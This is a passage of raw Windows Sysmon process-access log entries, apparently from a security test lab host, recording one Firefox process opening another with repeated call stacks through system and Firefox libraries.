Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.376{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.376{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.374{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.365{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.364{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.363{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.363{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.363{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.359{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.207{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.193{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.894{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.728{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.693{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.633{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.633{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.627{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.105{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:29.093{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.660{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.613{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 